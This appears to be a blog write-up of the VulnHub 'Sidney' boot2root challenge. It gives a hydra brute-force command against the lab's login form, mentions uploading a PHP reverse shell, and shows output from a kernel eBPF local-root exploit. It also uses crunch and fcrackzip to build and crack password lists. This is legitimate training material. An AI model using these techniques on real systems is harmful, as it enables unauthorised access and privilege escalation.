Welcome to my third boot2root / CTF this one is called Sidney. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM. You will need to snag the flag, and being me, it’s never where they normally live… B-)
If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56
Some hints for you:
If you are hitting a wall, read https://de.wikipedia.org/wiki/MOS_Technology_6502
The flag is audio as well as visual
Looks like port 80 is the only port that’s open. The page is filled with some text and a picture.
So…. Back for more are you….? Give Ben Daglish a call. I’m sure he’s know the login B-)
Commodore 64 Still ready
Nothing in the source code. So let’s check the picture first with exiftool. But nothing there. There are a few things on the site that can be interpreted as a hint. Let’s start with ‘Ben Daglish’ first. He’s a songwriter with numerous songs on his belt. I made a wordlist with all his songs and run it through dirbuster. But to no avail. Because a wordlist didn’t work, I used dirbuster in brute-force mode.
There is a /commodore64/ directory.
In the source code there is a comment:
<!– added by robhubbard password is the C=64 sound chip lowercase –>
<!– 3letters4digits no space… Instead, show user a proper micro –>
According to Wikipedia Ron Hubbard is a British composer best known for his composition of computer game theme music, especially for microcomputers of the 1980s such as the Commodore 64. Well isn’t this a coincidence. From the wiki page about Ron Hubbard, I was redirected to https://en.m.wikipedia.org/wiki/MOS_Technology_SID (just like the hint said).
With the newly found directory I used dirb to enumerate some more.
There are a lot of hits. First try is /index.php. This leads to the login page.
In the previous comment there are a few hints that can offer a solution for logging in the system. It was said that the password was added by robhubbard. So this would probably be the username. As for the password, it is composed of the C=64 sound chip, lowercase 3letters4digits and no space. In the wiki page it was mentioned that the C64 sound chip (MOS technology – 3 letters) had several models named like ‘6581 R1’ (4 digits). So the password is probably something like mos6581 or something. Because there are 10^4 possibilities I used crunch to create a list.
crunch 7 7 -t mos%%%% -o passwords.txt
Now it’s time to use this list with hydra. For hydra to work I need some additional information.
hydra 192.168.56.2 -l robhubbard -P passwords.txt -v -t 10 -w 30 http-form-post “/commodore64/index.php:input_username=^USER^&input_password=^PASS^:Log in”
After viewing all options I decided to upload the php-reverse-shell from pentestmonkey and run it.
And I’m in. Time to enumerate the system.
$ cat /etc/*-release
DISTRIB_DESCRIPTION=”Ubuntu 16.04 LTS”
VERSION=”16.04 LTS (Xenial Xerus)”
PRETTY_NAME=”Ubuntu 16.04 LTS”
$ uname -a
Linux sidney 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Checking exploit-db there is local root exploit (https://www.exploit-db.com/exploits/39772/). According to the description:
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, …), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
An exploit that puts all this together is in exploit.tar
After I downloaded the file I used the php file manager to upload this file.
$ tar -xvf exploit.tar
$ cd ebpf_mapfd_doubleput_exploit
woohoo, got pointer reuse
writev returned successfully. if this worked, you’ll have a root shell in <=60 seconds.
suid file detected, launching rootshell…
we have root privs now…
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Getting the Flag
A hint is always welcome.
cp hint.gif /var/www/html/commodore64/
After I copied the file, I used the file manager to download the file.
Ok…..not really sure if this is helpful. Back to the remote system.
ls -aRl /root
drwx—— 3 root root 4096 May 25 18:40 .
drwxr-xr-x 23 root root 4096 May 31 20:39 ..
-rw-r–r– 1 root root 3106 Oct 22 2015 .bashrc
dr——– 3 root root 4096 May 24 21:02 .commodore64
-rw-r–r– 1 root root 148 Aug 17 2015 .profile
-rw-rw-r– 1 rhubbard rhubbard 62464 May 24 21:27 hint.gif
dr——– 3 root root 4096 May 24 21:02 .
drwx—— 3 root root 4096 May 25 18:40 ..
dr——– 3 root root 4096 May 24 21:01 .miami
dr——– 3 root root 4096 May 24 21:01 .
dr——– 3 root root 4096 May 24 21:02 ..
dr——– 2 root root 4096 May 25 18:40 vice
dr——– 2 root root 4096 May 25 18:40 .
dr——– 3 root root 4096 May 24 21:01 ..
-r——– 1 rhubbard rhubbard 4089 May 24 20:59 flag.zip
-r——– 1 root root 0 May 24 21:02 versatile_commodore_emulator
Like the hint.gif file, I downloaded the flag.zip to my local system with the file manager.
I tried to crack the zip with fcrackzip, but I noticed that the zip file didn’t made it through. Checking the permissions I noticed that the permission of flag.zip was 400 and the rest of the files was 644. After changing the permission of flag.zip the file was downloaded perfectly. Now for fcrackzip again.
fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt flag.zip
[flag.zip] flag.d64 password:
A d64 extension. In the directory where flag.zip came from, there was also versatile_commodore_emulator. A quick Google search learns that this file could be a commodore 64 disk image and that Vice is the best solution for running that file.
After a few tries, Vice wasn’t really going to run properly and according to some forums it needs some work. Because this challenge has taken enough time, I finished this challenge the easy way. With strings.
SCREEN 1 –
}WELL DONE ONCE MORE ON GETTING THE}
}FLAG –VULNHUB’S FIRST C=64 ONE– }
}WHICH I HOPE YOU ENJOYED. }
}SHOUT-OUTS TO #VULNHUB & A S
}THANKS GOES TO GKNSB & RASTA
}FOR TESTING & G0TMI1K FOR HOSTING.}
}COMMODORE 64 – STILL READY }
Fun challenge overall.